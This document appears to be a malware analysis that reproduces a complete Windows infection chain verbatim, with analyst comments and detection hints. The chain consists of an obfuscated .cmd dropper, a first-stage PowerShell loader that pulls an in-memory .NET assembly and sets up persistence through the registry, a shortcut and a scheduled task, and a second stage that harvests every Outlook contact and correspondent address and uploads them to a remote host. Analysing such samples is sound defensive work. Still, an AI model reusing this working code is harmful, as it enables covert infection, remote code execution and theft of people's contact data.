- https://app.any.run/tasks/db253ae2-2864-479d-a0dd-de0dbfe73796
- https://transfer.sh/DsEla/files.7z
- http://higridis.site/boleto.php -> https://www.dropbox.com/s/7tc757lrqz48ojm/Termo-Acerto_1525379604.zip?dl=1
- Termo-Acerto_1525379604.cmd:
rem NOTE(review): obfuscated dropper script from the ZIP listed above, kept byte-for-byte as evidence.
rem It changes into %SystemRoot%\System32 so the relative interpreter path on the last line resolves.
- @echo off
- cd %SystemRoot%\System32
rem fTP is assembled into a 62-character lookup alphabet (indices 0-61).
rem Every later %fTP:~N,1% expands to the single character at index N.
- set fTP=
- Set fTP=%fTP%Cq2a
- Set fTP=%fTP%SiK7
- Set fTP=%fTP%rmhc
- Set fTP=%fTP%zXwB
- Set fTP=%fTP%8yIM
- Set fTP=%fTP%1uYj
- Set fTP=%fTP%Je6k
- Set fTP=%fTP%G0fO
- Set fTP=%fTP%dtsF
- Set fTP=%fTP%5gPv
- Set fTP=%fTP%VQE3
- Set fTP=%fTP%4oWT
- Set fTP=%fTP%DUZ9
- Set fTP=%fTP%nlLx
- Set fTP=%fTP%pHAb
- Set fTP=%fTP%RN
rem aa holds an escaped pipe character; it becomes the real pipe on the last line.
- set aa=^|
rem data is built one character at a time. Substituting the alphabet gives a mixed-case,
rem nested Invoke-Expression of (New-Object Net.WebClient).DownloadString('https://dlm.nadolt.com/?<token>'),
rem i.e. a fetch-and-run of remote PowerShell text from the same host used by the 1st-stage script.
- set data=
- Set data=%data%%fTP:~5,1%%fTP:~42,1%%fTP:~13,1%("%fTP:~18,1%%fTP:~42,1%%fTP:~55,1%(%fTP:~61,1%%fTP:~25,1%
- Set data=%data%%fTP:~46,1%-%fTP:~45,1%%fTP:~59,1%%fTP:~24,1%%fTP:~25,1%%fTP:~11,1%%fTP:~47,1% %fTP:~61,1%%fTP:~25,1%
- Set data=%data%%fTP:~47,1%.%fTP:~14,1%%fTP:~42,1%%fTP:~15,1%%fTP:~11,1%%fTP:~54,1%%fTP:~18,1%%fTP:~25,1%%fTP:~52,1%%fTP:~33,1%
- Set data=%data%).%fTP:~32,1%%fTP:~31,1%%fTP:~46,1%%fTP:~52,1%%fTP:~54,1%%fTP:~31,1%%fTP:~3,1%%fTP:~48,1%%fTP:~34,1%
- Set data=%data%%fTP:~47,1%%fTP:~8,1%%fTP:~5,1%%fTP:~52,1%%fTP:~28,1%('%fTP:~10,1%%fTP:~33,1%%fTP:~33,1%
- Set data=%data%%fTP:~56,1%%fTP:~34,1%://%fTP:~32,1%%fTP:~53,1%%fTP:~9,1%.%fTP:~52,1%%fTP:~3,1%
- Set data=%data%%fTP:~32,1%%fTP:~45,1%%fTP:~53,1%%fTP:~33,1%.%fTP:~11,1%%fTP:~45,1%%fTP:~9,1%/?%fTP:~32,1%
- Set data=%data%%fTP:~9,1%%fTP:~24,1%%fTP:~5,1%%fTP:~21,1%%fTP:~58,1%%fTP:~3,1%%fTP:~28,1%%fTP:~22,1%%fTP:~26,1%%fTP:~42,1%%fTP:~0,1%
- Set data=%data%%fTP:~51,1%%fTP:~50,1%%fTP:~33,1%%fTP:~15,1%%fTP:~25,1%%fTP:~16,1%%fTP:~56,1%%fTP:~6,1%%fTP:~47,1%%fTP:~19,1%%fTP:~0,1%
- Set data=%data%%fTP:~4,1%%fTP:~37,1%%fTP:~56,1%%fTP:~60,1%%fTP:~25,1%%fTP:~40,1%%fTP:~13,1%%fTP:~53,1%%fTP:~3,1%%fTP:~20,1%%fTP:~54,1%
- Set data=%data%%fTP:~48,1%%fTP:~56,1%%fTP:~22,1%%fTP:~52,1%%fTP:~14,1%%fTP:~36,1%%fTP:~32,1%%fTP:~13,1%%fTP:~30,1%%fTP:~34,1%%fTP:~0,1%
- Set data=%data%%fTP:~18,1%%fTP:~54,1%%fTP:~13,1%%fTP:~3,1%%fTP:~43,1%%fTP:~35,1%%fTP:~23,1%%fTP:~55,1%%fTP:~60,1%%fTP:~49,1%%fTP:~23,1%
- Set data=%data%%fTP:~32,1%%fTP:~23,1%%fTP:~34,1%%fTP:~17,1%%fTP:~60,1%%fTP:~31,1%%fTP:~4,1%%fTP:~34,1%%fTP:~31,1%%fTP:~4,1%%fTP:~31,1%
- Set data=%data%%fTP:~1,1%%fTP:~23,1%%fTP:~8,1%%fTP:~23,1%%fTP:~59,1%%fTP:~31,1%%fTP:~46,1%%fTP:~21,1%%fTP:~8,1%%fTP:~54,1%%fTP:~61,1%
- Set data=%data%%fTP:~47,1%%fTP:~39,1%%fTP:~18,1%%fTP:~28,1%%fTP:~58,1%%fTP:~3,1%%fTP:~58,1%%fTP:~45,1%%fTP:~40,1%%fTP:~14,1%%fTP:~43,1%
- Set data=%data%%fTP:~27,1%%fTP:~48,1%%fTP:~16,1%%fTP:~2,1%/%fTP:~46,1%%fTP:~8,1%%fTP:~18,1%%fTP:~38,1%%fTP:~58,1%%fTP:~59,1%
- Set data=%data%%fTP:~43,1%%fTP:~40,1%%fTP:~50,1%%fTP:~9,1%%fTP:~48,1%%fTP:~50,1%%fTP:~3,1%/%fTP:~5,1%%fTP:~58,1%%fTP:~51,1%
- Set data=%data%%fTP:~36,1%')");
rem The tail of the next line decodes to: WindowsPowerShell\v1.0\powershell.exe -nop -win 1 -
rem (no profile, window style 1 = Hidden, and "-" tells PowerShell to read its command from stdin).
rem NOTE(review): %%data%% presumably survives the first parse as %data% and is expanded by the child
rem cmd.exe that runs the left side of the pipe - confirm against the original sample.
rem Detection: cmd.exe spawning powershell.exe with -nop, a hidden window and stdin ("-") as the script source.
- echo %%data%%%aa%%fTP:~46,1%%fTP:~5,1%%fTP:~52,1%%fTP:~32,1%%fTP:~45,1%%fTP:~14,1%%fTP:~34,1%%fTP:~38,1%%fTP:~45,1%%fTP:~14,1%%fTP:~25,1%%fTP:~8,1%%fTP:~4,1%%fTP:~10,1%%fTP:~25,1%%fTP:~53,1%%fTP:~53,1%\%fTP:~39,1%%fTP:~20,1%.%fTP:~29,1%\%fTP:~56,1%%fTP:~45,1%%fTP:~14,1%%fTP:~25,1%%fTP:~8,1%%fTP:~34,1%%fTP:~10,1%%fTP:~25,1%%fTP:~53,1%%fTP:~53,1%.%fTP:~25,1%%fTP:~55,1%%fTP:~25,1% -%fTP:~52,1%%fTP:~45,1%%fTP:~56,1% -%fTP:~14,1%%fTP:~5,1%%fTP:~52,1% %fTP:~20,1% -
- 1st stage:
# NOTE(review): captured 1st-stage script, kept byte-for-byte as evidence; comments are analyst annotations.
# Overall flow: once-per-day guard -> load a remote .NET assembly in memory -> write a registry-driven
# .cmd launcher, a shortcut and a self-deleting scheduled task -> fetch and run the 2nd stage.
# Daily marker: a file named <yyyyMMdd> in %TEMP%. If it already exists, the whole body is skipped.
- $fileName = "$env:TEMP\$([System.DateTime]::Now.ToString('yyyyMMdd'))"
- $bExists = [System.IO.File]::Exists($fileName)
- if (-Not $bExists) {
- "" | Set-Content $fileName
# Downloads a byte blob, XORs every byte with 0x6A and loads the result as a .NET assembly
# straight from memory (this step writes nothing to disk).
- $bytes = (New-Object Net.WebClient).DownloadData("https://dlm.nadolt.com/?dmNvsQSFZqUA8ptBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbOWurLMjuHl4AB6tr3Eb//fWEH/0b3Vc1B8S+3gx5")
- for($i=0; $i -lt $bytes.count; $i++) {
- $bytes[$i] = $bytes[$i] -bxor 0x6A
- }
- [Reflection.Assembly]::Load($bytes)
# [Loader] comes from the assembly loaded above; its code is not part of this paste.
# Go3 receives the base URL, four opaque tokens and $prefix. NOTE(review): presumably it fetches the
# payload parts and stores them under names starting with $prefix, since the generated .cmd below
# looks for exactly that prefix - confirm by decompiling the assembly.
- $rInt = [Loader]::randomInt(4, 16)
- $prefix = "$([Loader]::RandomString($rInt))-"
- [Loader]::Go3("https://dlm.nadolt.com","dmBkvwaGaqEA9JtBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbPFOwN9DFNHgABIFrh0b7oqGxFKsXkFNmDJY=","dmFlsQGAZacF95tBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbPFOwN9DFNHgABIFrwGzs2KWxQfwfmFE0BZU=","dWRiuwGCYKdOoZ5uaslIatKzrpM7UgxV6Lz7bmE0QXHGC4HxaEtS0jo3UiQSRPqoPSGqi7rzFHiAN87dMGYAAZ9D80Ls2/L9TLFDxwE2AJHv2Q==","dWFksACDZ6UF9JtBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbPFOwN9DFNHgABIFrwG3Ry6yEH/0b3VE2BZC/3A56",$prefix)
# Random variable names and a random .cmd file name inside [Loader]::outDir (directory defined in the unseen assembly).
- $var1 = [Loader]::RandomString($rInt)
- $var2 = [Loader]::RandomString($rInt)
- $var3 = [Loader]::RandomString($rInt)
- $cmdFileName = "$([Loader]::outDir)\$([Loader]::RandomString([Loader]::randomInt(6, 16))).cmd"
# Generated launcher: builds the key path HKCU\Software\Microsoft in three steps, walks REG QUERY output,
# concatenates the data column (%%3) of every value whose name starts with $prefix, then executes the
# concatenated string as a command line.
# Detection: values named <random>-... under HKCU\Software\Microsoft, and cmd.exe running REG QUERY on that key.
- $cmdSource = "@Echo off`r`n"
- $cmdSource += "Setlocal EnableExtensions`r`n"
- $cmdSource += "Setlocal EnableDelayedExpansion`r`n"
- $cmdSource += "Set $var1=HKCU`r`n"
- $cmdSource += "Set $var1=%$var1%\Software`r`n"
- $cmdSource += "Set $var1=%$var1%\Microsoft`r`n"
- $cmdSource += "Set $var2=`r`n"
- $cmdSource += "FOR /F `"usebackq tokens=1,2*`" %%1 IN (``REG QUERY %$var1%``) DO (`r`n"
- $cmdSource += "Set $var3=%%11`r`n"
- $cmdSource += "IF `"!$var3`:~0,$($prefix.Length)!`"==`"$prefix`" (`r`n"
- $cmdSource += "Set $var2=!$var2!%%3`r`n"
- $cmdSource += ")`r`n"
- $cmdSource += ")`r`n"
- $cmdSource += "%$var2%`r`n"
- $cmdSource | Set-Content $cmdFileName
# Shortcut <USERNAME>.lnk in [Loader]::outDir that targets the launcher; WindowStyle 7 starts it minimized.
# NOTE(review): outDir is likely an autostart location - confirm from the assembly.
- $lnkFileName = "$([Loader]::outDir)\$env:USERNAME.lnk"
- $WshShell = New-Object -comObject WScript.Shell
- $Shortcut = $WshShell.CreateShortcut($lnkFilename)
- $Shortcut.TargetPath = $cmdFileName
- $Shortcut.WindowStyle = 7
- $Shortcut.Save()
# One-shot scheduled task through the Schedule.Service COM API: a time trigger (type 1) that starts 5 s
# from now and expires 30 s later, with two exec actions (type 0): run the launcher, then
# schtasks.exe /Delete /F /TN <taskName> to remove the task. DeleteExpiredTaskAfter "PT0M" also removes
# it as soon as it expires, so the task exists only briefly.
# Detection: task-creation events (Security 4698, TaskScheduler/Operational 106) for a random-named task
# whose action is a .cmd followed by a schtasks /Delete of itself.
- $TaskStartTime = [datetime]::Now.AddSeconds(5)
- $TaskEndTime = [datetime]::Now.AddSeconds(35)
- $taskName = [Loader]::RandomString($rInt)
- $service = New-Object -ComObject("Schedule.Service")
- $service.Connect()
- $rootFolder = $service.GetFolder("\")
- $TaskDefinition = $service.NewTask(0)
- $TaskDefinition.RegistrationInfo.Description = ""
- $TaskDefinition.Settings.Enabled = $true
- $TaskDefinition.Settings.DisallowStartIfOnBatteries = $false
- $TaskDefinition.Settings.DeleteExpiredTaskAfter = "PT0M"
- $triggers = $TaskDefinition.Triggers
- $trigger = $triggers.Create(1)
- $trigger.StartBoundary = $TaskStartTime.ToString("yyyy-MM-dd'T'HH:mm:ss")
- $trigger.EndBoundary = $TaskEndTime.ToString("yyyy-MM-dd'T'HH:mm:ss")
- $trigger.Enabled = $true
- $action = $TaskDefinition.Actions.Create(0)
- $action.Path = $cmdFileName
- $action.Arguments = ""
- $action = $TaskDefinition.Actions.Create(0)
- $action.Path = "schtasks.exe"
- $action.Arguments = "/Delete /F /TN $taskName"
# Flags 6 = create-or-update; empty user, null password and logon type 0 (none).
- $rootFolder.RegisterTaskDefinition($taskName, $TaskDefinition, 6, "", $null, 0)
# $urlPL is only assigned here; the 2nd-stage script reads it as the POST destination for its results.
- $urlPL = "https://dlm.nadolt.com/?dmRlsQKLZasK8JtBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbIVOwT9TuamdZH69NzWvW2++EHJxP7gpNXcDdhQRgMAEFpAYlS6o="
# Fetches the 2nd stage as text and runs it with IEX in this same session (so it can see $urlPL).
# Detection: PowerShell script-block logging (event 4104) records the downloaded text when enabled.
- IEX(New-Object Net.WebClient).DownloadString("https://dlm.nadolt.com/?dmVjuw2Aa6ID9ZtBe8pKTMCSgpReVXla1LDpYnw5dXfsCILXa3FjxRUjdjsyROSsOSOqjrjbIVOwT83WAXs4HpFoxEb4w/WCGIRPxzI5Cdq83F0tMARSpw==")
- }
- 2nd stage:
# NOTE(review): captured 2nd-stage script with machine-generated names, kept byte-for-byte as evidence.
# Setup: the first base64 string decodes (UTF-16LE) to "Microsoft.Office.Interop.Outlook" and the second
# to "MAPI". The script loads the Outlook interop assembly, creates an Outlook.Application COM object,
# opens its MAPI namespace and creates the script-level ArrayList that collects unique addresses.
# Detection: powershell.exe instantiating Outlook.Application / loading the Outlook interop assembly.
- Add-Type -assembly $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBpAGMAcgBvAHMAbwBmAHQALgBPAGYAZgBpAGMAZQAuAEkAbgB0AGUAcgBvAHAALgBPAHUAdABsAG8AbwBrAA==')))
- ${_/=\/\__/=\/\/\__} = New-Object -comobject Outlook.Application
- ${____/===\_____/\/} = ${_/=\/\__/=\/\/\__}.GetNameSpace($([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('TQBBAFAASQA='))))
- ${_/\/=====\__/=\/=} = [System.Collections.ArrayList]@()
# Address validator: returns $true when the argument matches the embedded pattern, otherwise $false.
# The base64 string decodes (UTF-16LE) to an e-mail address regex:
# local part and domain labels of [_a-z0-9-] / [a-z0-9-], ending in a 2-4 letter top-level domain.
- function ___/=\/\/=\___/=\_(${____/\____/\/\_/\_})
- {
- ${____/==\__/\_/=\_} = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('XgBbAF8AYQAtAHoAMAAtADkALQBdACsAKABcAC4AWwBfAGEALQB6ADAALQA5AC0AXQArACkAKgBAAFsAYQAtAHoAMAAtADkALQBdACsAKABcAC4AWwBhAC0AegAwAC0AOQAtAF0AKwApACoAKABcAC4AWwBhAC0AegBdAHsAMgAsADQAfQApACQA')));
- if (${____/\____/\/\_/\_} -match ${____/==\__/\_/=\_}) {
- return $true
- }
- return $false
- }
# Add-if-new: normalises one candidate address and appends it to the script-level ArrayList
# unless it is empty, fails the address-pattern check, or is already present.
- function _/=\_/==\____/\__/(${____/\____/\/\_/\_}) {
- if (${____/\____/\/\_/\_}) {
- ${__/=====\/\_/\_/\} = $false
# Normalisation: lower-case, then strip one pair of surrounding single quotes.
- ${____/\____/\/\_/\_} = ${____/\____/\/\_/\_}.ToLower()
- if (${____/\____/\/\_/\_}.StartsWith("'") -And ${____/\____/\/\_/\_}.EndsWith("'")) {
- ${____/\____/\/\_/\_} = ${____/\____/\/\_/\_}.Substring(1, ${____/\____/\/\_/\_}.Length - 2)
- }
- if (___/=\/\/=\___/=\_(${____/\____/\/\_/\_})) {
# Linear scan of the collected list for a duplicate.
- for(${__/\/\__/=\/\__/\} = 0;${__/\/\__/=\/\__/\} -lt ${_/\/=====\__/=\/=}.Count;${__/\/\__/=\/\__/\}++) {
- if (${_/\/=====\__/=\/=}[${__/\/\__/=\/\__/\}] -eq ${____/\____/\/\_/\_}) {
- ${__/=====\/\_/\_/\} = $true
- break
- }
- }
- if (-Not ${__/=====\/\_/\_/\}) {
# Add() returns the new index; assigning it to a variable keeps it out of the output stream.
- ${__/\___/========\} = ${_/\/=====\__/=\/=}.Add(${____/\____/\/\_/\_})
- }
- }
- }
- }
# Address-book walk: iterates every AddressList of the MAPI namespace and every AddressEntry in it
# (COM collections, hence the 1-based indexes) and passes each resolved address to the add-if-new function.
- function _/====\__/=====\_/ {
- ${/==\/=\____/\_/=\} = ${____/===\_____/\/}.AddressLists
- for(${__/\/\__/=\/\__/\} = 1;${__/\/\__/=\/\__/\} -le ${/==\/=\____/\_/=\}.Count;${__/\/\__/=\/\__/\}++) {
- ${/=\_/==\/\__/==\_} = ${/==\/=\____/\_/=\}.Item(${__/\/\__/=\/\__/\}).AddressEntries
- for(${/==\/\/\_/\_/\__/} = 1;${/==\/\/\_/\_/\__/} -le ${/=\_/==\/\__/==\_}.Count;${/==\/\/\_/\_/\__/}++) {
- ${_/\_/\__/\_____/=} = ${/=\_/==\/\__/==\_}.Item(${/==\/\/\_/\_/\__/})
- ${__/===\/===\/\/\_} = ${_/\_/\__/\_____/=}.AddressEntryUserType
- ${____/\____/\/\_/\_} = ""
# AddressEntryUserType 10 (Outlook contact): the Address property is used directly.
# Types 0-5 (the Exchange entry kinds): the primary SMTP address is resolved through GetExchangeUser().
# Any other type leaves the address empty, which the add-if-new function ignores.
- if (${__/===\/===\/\/\_} -eq 10) {
- ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.Address
- } elseif ((${__/===\/===\/\/\_} -eq 3) -Or (${__/===\/===\/\/\_} -eq 1) -Or (${__/===\/===\/\/\_} -eq 4) -Or (${__/===\/===\/\/\_} -eq 2) -Or (${__/===\/===\/\/\_} -eq 5) -Or (${__/===\/===\/\/\_} -eq 0)) {
- ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.GetExchangeUser().PrimarySmtpAddress
- }
- _/=\_/==\____/\__/(${____/\____/\/\_/\_})
- }
- }
- }
# Mailbox walk: for every folder in the given Folders collection, reads each item's recipients and
# sender, passes the resolved addresses to the add-if-new function, then recurses into the subfolders.
- function __/\/\__/\_/===\_/(${___/\/==\_/==\/=\/}) {
- for(${__/\/\__/=\/\__/\} = 1;${__/\/\__/=\/\__/\} -le ${___/\/==\_/==\/=\/}.Count;${__/\/\__/=\/\__/\}++) {
- ${_/======\_/=\/=\_} = ${___/\/==\_/==\/=\/}.Item(${__/\/\__/=\/\__/\})
- ${__/\/=\___/\_/==\} = ${_/======\_/=\/=\_}.Items
- for(${/==\/\/\_/\_/\__/} = 1;${/==\/\/\_/\_/\__/} -le ${__/\/=\___/\_/==\}.Count;${/==\/\/\_/\_/\__/}++) {
- ${_/==\_____/==\__/} = ${__/\/=\___/\_/==\}.Item(${/==\/\/\_/\_/\__/})
- ${/=\/====\____/=\/} = ${_/==\_____/==\__/}.Recipients
# Recipients: type 0 (Exchange user) is resolved to its primary SMTP address;
# types 30 (SMTP) and 10 (Outlook contact) use the Address property as-is.
- for(${_/\_/\__/\/\_/=\_} = 1;${_/\_/\__/\/\_/=\_} -le ${/=\/====\____/=\/}.Count;${_/\_/\__/\/\_/=\_}++) {
- ${__/\_/\__/=\/\_/\} = ${/=\/====\____/=\/}.Item(${_/\_/\__/\/\_/=\_})
- ${_/\_/\__/\_____/=} = ${__/\_/\__/=\/\_/\}.AddressEntry
- ${__/===\/===\/\/\_} = ${_/\_/\__/\_____/=}.AddressEntryUserType
- ${____/\____/\/\_/\_} = "";
- if (${__/===\/===\/\/\_} -eq 0) {
- ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.GetExchangeUser().PrimarySmtpAddress
- } elseif ((${__/===\/===\/\/\_} -eq 30) -Or (${__/===\/===\/\/\_} -eq 10)) {
- ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.Address
- }
- _/=\_/==\____/\__/(${____/\____/\/\_/\_})
- }
# Sender of the same item, resolved with the same type rules as the recipients.
- ${_/\_/\__/\_____/=} = ${_/==\_____/==\__/}.Sender
- ${__/===\/===\/\/\_} = ${_/\_/\__/\_____/=}.AddressEntryUserType
- ${____/\____/\/\_/\_} = "";
- if (${__/===\/===\/\/\_} -eq 0) {
- ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.GetExchangeUser().PrimarySmtpAddress
- } elseif ((${__/===\/===\/\/\_} -eq 30) -Or (${__/===\/===\/\/\_} -eq 10)) {
- ${____/\____/\/\_/\_} = ${_/\_/\__/\_____/=}.Address
- }
- _/=\_/==\____/\__/(${____/\____/\/\_/\_})
- }
# Recursion into this folder's subfolders.
- __/\/\__/\_/===\_/(${_/======\_/=\/=\_}.Folders)
- }
- }
# Collect-and-send: runs the address-book walk and the mailbox walk, releases the Outlook COM object,
# then uploads the collected addresses in a single HTTP request.
# Detection: an outbound POST from powershell.exe with a body starting "list=" and ';'-separated addresses.
- function ____/=\_/\_/==\/==() {
- _/====\__/=====\_/
- __/\/\__/\_/===\_/(${____/===\_____/\/}.Folders)
- ${/\_____/\_/\/==\/} = [System.Runtime.Interopservices.Marshal]::ReleaseComObject(${_/=\/\__/=\/\/\__})
# $urlPL is not defined in this script; the 1st-stage script assigns it before running this stage with IEX.
- ${_/\__/\/\/\_/\/=\} = [System.Net.WebRequest]::Create($urlPL)
# Request body: "list=" followed by all collected addresses joined with ';', encoded as UTF-8.
- ${/=\___/==\/=\__/=} = [System.Text.Encoding]::UTF8.GetBytes("list=$(${_/\/=====\__/=\/=} -join ';')")
# The two base64 strings decode to "POST" and "application/x-www-form-urlencoded".
- ${_/\__/\/\/\_/\/=\}.Method = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('UABPAFMAVAA=')))
- ${_/\__/\/\/\_/\/=\}.ContentType = $([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('YQBwAHAAbABpAGMAYQB0AGkAbwBuAC8AeAAtAHcAdwB3AC0AZgBvAHIAbQAtAHUAcgBsAGUAbgBjAG8AZABlAGQA')))
- ${_/\__/\/\/\_/\/=\}.ContentLength = ${/=\___/==\/=\__/=}.length
- ${___/=\_/\/\/=\___} = ${_/\__/\/\/\_/\/=\}.GetRequestStream()
- ${___/=\_/\/\/=\___}.Write(${/=\___/==\/=\__/=}, 0, ${/=\___/==\/=\__/=}.length)
- ${___/=\_/\/\/=\___}.Close()
# The response is fetched but never read.
- [System.Net.WebResponse] ${/===\/=\____/\/=\} = ${_/\__/\/\/\_/\/=\}.GetResponse()
- }
# Run-once guard: the base64 string decodes (UTF-16LE) to '$env:APPDATA\Microsoft\.Outlook', which
# ExpandString resolves to a path under the user's roaming profile. If that file does not exist, it is
# created empty ("sc" is the Set-Content alias) and the collect-and-send function runs; otherwise nothing happens.
# Detection / triage: presence of %APPDATA%\Microsoft\.Outlook indicates this stage has already run for the user.
- function _/=\/\/\_/\____/=\() {
- ${__/======\____/\_} = $ExecutionContext.InvokeCommand.ExpandString([Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABNAGkAYwByAG8AcwBvAGYAdABcAC4ATwB1AHQAbABvAG8AawA=')))
- ${__/==\/\__/\/===\} = [System.IO.File]::Exists(${__/======\____/\_})
- if (-Not ${__/==\/\__/\/===\}) {
- "" | sc ${__/======\____/\_}
- ____/=\_/\_/==\/==
- }
- }
# Entry point of the 2nd stage: calls the run-once guard function defined directly above.
- _/=\/\/\_/\____/=\